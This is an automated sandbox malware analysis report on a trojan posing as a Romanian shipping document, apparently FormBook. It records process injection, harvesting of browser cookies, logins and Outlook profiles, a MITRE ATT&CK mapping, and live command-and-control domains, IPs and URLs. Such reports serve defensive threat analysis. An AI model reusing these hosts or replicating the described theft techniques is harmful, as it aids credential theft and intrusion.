Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\sc.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: NULL target: C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: NULL target: C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\sc.exe

Thread register set: target process: 5580

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\sc.exe

Thread APC queued: target process: C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe

Writes to foreign memory regions

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 253008

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_00D3B106 LogonUserW,

0_2_00D3B106

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_00D03D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00D03D19

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_00D4411C SendInput,keybd_event,

0_2_00D4411C

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_00D474E7 mouse_event,

0_2_00D474E7

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe"	Jump to behavior
Source: C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe	Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\SysWOW64\sc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

0_2_00D3A66C

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_00D471FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00D471FA

Source: AWB_5771388044 Documente de expediere.exe, dnqNlDRmfuUrS.exe, 00000005.00000000.2174171638.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, dnqNlDRmfuUrS.exe, 00000005.00000002.2915782839.00000000014B1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: dnqNlDRmfuUrS.exe, 00000005.00000000.2174171638.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, dnqNlDRmfuUrS.exe, 00000005.00000002.2915782839.00000000014B1000.00000002.00000001.00040000.00000000.sdmp, dnqNlDRmfuUrS.exe, 00000007.00000000.2317837261.0000000001AC0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: AWB_5771388044 Documente de expediere.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
Source: dnqNlDRmfuUrS.exe, 00000005.00000000.2174171638.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, dnqNlDRmfuUrS.exe, 00000005.00000002.2915782839.00000000014B1000.00000002.00000001.00040000.00000000.sdmp, dnqNlDRmfuUrS.exe, 00000007.00000000.2317837261.0000000001AC0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: dnqNlDRmfuUrS.exe, 00000005.00000000.2174171638.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, dnqNlDRmfuUrS.exe, 00000005.00000002.2915782839.00000000014B1000.00000002.00000001.00040000.00000000.sdmp, dnqNlDRmfuUrS.exe, 00000007.00000000.2317837261.0000000001AC0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_00D265C4 cpuid

0_2_00D265C4

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_00D5091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,

0_2_00D5091D

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_00D7B340 GetUserNameW,

0_2_00D7B340

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_00D31E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00D31E8E

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_00D1DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00D1DDC0

Stealing of Sensitive Information

Tries to harvest and steal browser information (history, passwords, etc)

Source: Yara match	File source: 1.2.svchost.exe.4e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.4e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2914944914.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2916379942.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2248534012.0000000002F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2248246717.00000000004E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2915999242.0000000001630000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2916441443.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2248900268.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2916213463.0000000003560000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\sc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\sc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Source: AWB_5771388044 Documente de expediere.exe	Binary or memory string: WIN_81
Source: AWB_5771388044 Documente de expediere.exe	Binary or memory string: WIN_XP
Source: AWB_5771388044 Documente de expediere.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
Source: AWB_5771388044 Documente de expediere.exe	Binary or memory string: WIN_XPe
Source: AWB_5771388044 Documente de expediere.exe	Binary or memory string: WIN_VISTA
Source: AWB_5771388044 Documente de expediere.exe	Binary or memory string: WIN_7
Source: AWB_5771388044 Documente de expediere.exe	Binary or memory string: WIN_8

Remote Access Functionality

Source: Yara match	File source: 1.2.svchost.exe.4e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.4e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2914944914.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2916379942.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2248534012.0000000002F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2248246717.00000000004E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2915999242.0000000001630000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2916441443.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2248900268.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2916213463.0000000003560000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D58C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00D58C4F
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D5923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00D5923B

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	3 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Service Execution	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 Windows Service	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	251 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Windows Service	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	412 Process Injection	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
AWB_5771388044 Documente de expediere.exe	76%	ReversingLabs	Win32.Trojan.AutoitInject
AWB_5771388044 Documente de expediere.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.avalanchefi.xyz/ctta/?FH1D=O4FXjFCpJjRpaxv&gdIlTvE8=73htI/07lnbi6jhjvkNHrlWSa6BSjsKivRRSV4arkt57XDlKC2xJvna+Jje1nWd5k0Z3PS0VVZTw4ek7NFPoag2/xWEWhdCP8yoM02bo7Rk5ZALP8w8OFi4=	0%	Avira URL Cloud	safe
http://www.avalanchefi.xyz	0%	Avira URL Cloud	safe
http://www.jalan2.online/xu9o/	0%	Avira URL Cloud	safe
http://www.avalanchefi.xyz/ctta/	0%	Avira URL Cloud	safe
http://www.bloodbalancecaps.shop/7n6c/?FH1D=O4FXjFCpJjRpaxv&gdIlTvE8=ePeKNPyUeLpNn1ut9QR5+vkaHUGSQvJrwPLb6fKcgQCso5jGZqjP6M9GYYTFao+4npn6icqsLwsi7nEjf66UvTUwrIE2dD1LfojjSGoioIp2xNG+LZcOM+Y=	0%	Avira URL Cloud	safe
http://www.jalan2.online/xu9o/?gdIlTvE8=Y1SnkQLh9oyCIrW0o0O4vqPemXX8Spt1zoY93P6OWbCvdS06v54NadN0bxhIZaxlyI96f1lIInN9xaPSBVcrMr8DLl9ZyJ18b2nxQ81rZE0uLnMg7aaVIRg=&FH1D=O4FXjFCpJjRpaxv	0%	Avira URL Cloud	safe
http://bloodbalancecaps.shop/7n6c/?FH1D=O4FXjFCpJjRpaxv&gdIlTvE8=ePeKNPyUeLpNn1ut9QR5	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.avalanchefi.xyz	13.248.169.48	true	true	unknown
jalan2.online	108.181.189.7	true	true	unknown
bloodbalancecaps.shop	108.179.253.197	true	true	unknown
www.02760.wang	unknown	unknown	false	unknown
www.jalan2.online	unknown	unknown	false	unknown
www.bloodbalancecaps.shop	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.avalanchefi.xyz/ctta/?FH1D=O4FXjFCpJjRpaxv&gdIlTvE8=73htI/07lnbi6jhjvkNHrlWSa6BSjsKivRRSV4arkt57XDlKC2xJvna+Jje1nWd5k0Z3PS0VVZTw4ek7NFPoag2/xWEWhdCP8yoM02bo7Rk5ZALP8w8OFi4=	true	Avira URL Cloud: safe	unknown
http://www.jalan2.online/xu9o/?gdIlTvE8=Y1SnkQLh9oyCIrW0o0O4vqPemXX8Spt1zoY93P6OWbCvdS06v54NadN0bxhIZaxlyI96f1lIInN9xaPSBVcrMr8DLl9ZyJ18b2nxQ81rZE0uLnMg7aaVIRg=&FH1D=O4FXjFCpJjRpaxv	true	Avira URL Cloud: safe	unknown
http://www.jalan2.online/xu9o/	true	Avira URL Cloud: safe	unknown
http://www.bloodbalancecaps.shop/7n6c/?FH1D=O4FXjFCpJjRpaxv&gdIlTvE8=ePeKNPyUeLpNn1ut9QR5+vkaHUGSQvJrwPLb6fKcgQCso5jGZqjP6M9GYYTFao+4npn6icqsLwsi7nEjf66UvTUwrIE2dD1LfojjSGoioIp2xNG+LZcOM+Y=	true	Avira URL Cloud: safe	unknown
http://www.avalanchefi.xyz/ctta/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	sc.exe, 00000006.00000003.2435734617.0000000007C4D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	sc.exe, 00000006.00000003.2435734617.0000000007C4D000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.avalanchefi.xyz	dnqNlDRmfuUrS.exe, 00000007.00000002.2915999242.000000000168F000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	sc.exe, 00000006.00000003.2435734617.0000000007C4D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	sc.exe, 00000006.00000003.2435734617.0000000007C4D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	sc.exe, 00000006.00000003.2435734617.0000000007C4D000.00000004.00000020.00020000.00000000.sdmp	false		high
http://bloodbalancecaps.shop/7n6c/?FH1D=O4FXjFCpJjRpaxv&gdIlTvE8=ePeKNPyUeLpNn1ut9QR5	sc.exe, 00000006.00000002.2917111114.0000000003C24000.00000004.10000000.00040000.00000000.sdmp, dnqNlDRmfuUrS.exe, 00000007.00000002.2916712819.0000000003804000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2540186843.0000000005824000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	sc.exe, 00000006.00000003.2435734617.0000000007C4D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	sc.exe, 00000006.00000003.2435734617.0000000007C4D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	sc.exe, 00000006.00000003.2435734617.0000000007C4D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	sc.exe, 00000006.00000003.2435734617.0000000007C4D000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
13.248.169.48	www.avalanchefi.xyz	United States	16509	AMAZON-02US	true
108.179.253.197	bloodbalancecaps.shop	United States	46606	UNIFIEDLAYER-AS-1US	true
108.181.189.7	jalan2.online	Canada	852	ASN852CA	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1571472
Start date and time:	2024-12-09 13:12:04 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 58s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	AWB_5771388044 Documente de expediere.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/3@4/3
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 90% Number of executed functions: 48 Number of non-executed functions: 297
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
VT rate limit hit for: AWB_5771388044 Documente de expediere.exe

Simulations

Behavior and APIs

Time	Type	Description
07:14:28	API Interceptor	13534x Sleep call for process: sc.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
13.248.169.48	Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe	Get hash	malicious	FormBook	Browse	www.hsa.world/09b7/
	MN1qo2qaJmEvXDP.exe	Get hash	malicious	FormBook	Browse	www.lovel.shop/rxts/
	RFQ _ Virtue 054451000085.exe	Get hash	malicious	FormBook	Browse	www.snyp.shop/4nyz/
	NEW.RFQ00876.pdf.exe	Get hash	malicious	FormBook	Browse	www.krshop.shop/5p01/
	DHL_734825510.exe	Get hash	malicious	FormBook	Browse	www.egyshare.xyz/440l/
	purchase order.exe	Get hash	malicious	FormBook	Browse	www.aktmarket.xyz/wb7v/
	SRT68.exe	Get hash	malicious	FormBook	Browse	www.avalanchefi.xyz/vxa5/
	ek8LkB2Cgo.exe	Get hash	malicious	FormBook	Browse	www.remedies.pro/4azw/
	Document_084462.scr.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.optimismbank.xyz/98j3/?2O=jo1iJOnj8ueGZPJDfvyWmhhX4bGAJjt1DdtSaCSQL5v3UEYBE5VATgnqgu9yCYXU1qT81UG2HbOLQLBbZNDoJaqiWagLaQ4MrpZVJnF4w7w/HKU2baOdEb4=&ChhG6=J-xs
	Pp7OXMFwqhXKx5Y.exe	Get hash	malicious	FormBook	Browse	www.smartgov.shop/1cwp/
108.179.253.197	DHL_734825510.exe	Get hash	malicious	FormBook	Browse	www.bloodbalancecaps.shop/qimy/
108.179.253.197	SW_5724.exe	Get hash	malicious	FormBook	Browse	www.bloodbalancecaps.shop/qimy/
108.181.189.7	lgkWBwqY15.exe	Get hash	malicious	FormBook	Browse	www.jalan2.online/lvda/
	New quotation request.exe	Get hash	malicious	FormBook	Browse	www.jalan2.online/lvda/
	Quotation Validity.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.jalan2.online/ykgd/
	lKvXJ7VVCK.exe	Get hash	malicious	FormBook	Browse	www.jalan2.online/xu9o/
	Purchase Order PO.exe	Get hash	malicious	FormBook	Browse	www.jalan2.online/ykgd/
	New Order - RCII900718_Contract Drafting.exe	Get hash	malicious	FormBook	Browse	www.jalan2.online/xu9o/
	need quotations.exe	Get hash	malicious	FormBook	Browse	www.jalan2.online/lvda/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.avalanchefi.xyz	SRT68.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	lKvXJ7VVCK.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	New Order - RCII900718_Contract Drafting.exe	Get hash	malicious	FormBook	Browse	13.248.169.48

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
UNIFIEDLAYER-AS-1US	Owari.sh4.elf	Get hash	malicious	Unknown	Browse	192.163.253.90
	http://74.50.69.234/	Get hash	malicious	Unknown	Browse	192.185.131.189
	http://74.50.69.234/	Get hash	malicious	Unknown	Browse	192.185.131.189
	jmhgeojeri.elf	Get hash	malicious	Unknown	Browse	162.145.178.130
	Fw 2025 Employee Handbook For all Colhca Employees Ref THEFUE.eml	Get hash	malicious	Unknown	Browse	192.185.35.240
	TECHNICAL SPECIFICATIONS.exe	Get hash	malicious	AgentTesla	Browse	192.254.225.136
	https://hujalconcretos.com/npp	Get hash	malicious	Unknown	Browse	192.185.131.189
	DHL_734825510.exe	Get hash	malicious	FormBook	Browse	108.179.253.197
	Shipping Documents 72908672134.exe	Get hash	malicious	AgentTesla	Browse	192.254.186.165
	#U25b6#Ufe0fPlayVoiceMessage9266.eml	Get hash	malicious	Unknown	Browse	192.185.77.66
ASN852CA	Owari.ppc.elf	Get hash	malicious	Unknown	Browse	205.206.220.180
	jew.ppc.elf	Get hash	malicious	Unknown	Browse	173.180.42.125
	sora.mpsl.elf	Get hash	malicious	Mirai	Browse	173.181.196.166
	8AE6w4efXi.exe	Get hash	malicious	Unknown	Browse	108.181.20.36
	8AE6w4efXi.exe	Get hash	malicious	Unknown	Browse	108.181.20.36
	meerkat.arm.elf	Get hash	malicious	Mirai	Browse	199.126.85.44
	jmggnxeedy.elf	Get hash	malicious	Unknown	Browse	154.5.23.163
	pjyhwsdgkl.elf	Get hash	malicious	Unknown	Browse	206.75.101.242
	jew.sh4.elf	Get hash	malicious	Unknown	Browse	161.187.17.140
	i586.elf	Get hash	malicious	Unknown	Browse	216.232.55.178
AMAZON-02US	Potvrda_o_uplati.docx.doc	Get hash	malicious	Unknown	Browse	54.150.207.131
	http://doctifyblog.com	Get hash	malicious	Unknown	Browse	52.95.149.107
	https://www.egencia.com/conversations/cp/connect.html/?id=9445ace5-416d-4fb9-b151-bab0770ccdde	Get hash	malicious	Unknown	Browse	52.211.89.170
	pXdN91.armv5l.elf	Get hash	malicious	Mirai, Gafgyt	Browse	54.171.230.55
	9QwZPBACyK.exe	Get hash	malicious	Unknown	Browse	185.166.143.50
	https://www.drvhub.net	Get hash	malicious	Unknown	Browse	18.244.202.69
	Owari.sh4.elf	Get hash	malicious	Unknown	Browse	34.217.158.251
	https://www.drvhub.net	Get hash	malicious	Unknown	Browse	108.158.75.80
	https://www.drvhub.net	Get hash	malicious	Unknown	Browse	3.160.77.34
	Owari.arm7.elf	Get hash	malicious	Mirai	Browse	18.155.226.108

Process:	C:\Windows\SysWOW64\sc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\aut6327.tmp

Download File

Process:	C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe
File Type:	data
Category:	dropped
Size (bytes):	290304
Entropy (8bit):	7.9924146979310535
Encrypted:	true
SSDEEP:	6144:KDvAWDDDDDDDDcPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDy:Fz8fnUmyPsS/aIFVelBTDn7
MD5:	BBA1B386F3AE1207B22C81972194B68C
SHA1:	3F42916729E813A08C30B8D5C1C56D727CC7390D
SHA-256:	3DD63B8D8CFE959D5DCF4A8AABB3BE87C96FBD691DBFA98BF3DCA7C7A4089B4E
SHA-512:	EF48BAB28FB321E51B144E8EC3950B8373B2C0991F34489911529352D4994E28ACFDC14D8BE1F565B8BB287D675312525BA0A2B688E369D87A4A86E907AF578A
Malicious:	false
Reputation:	low
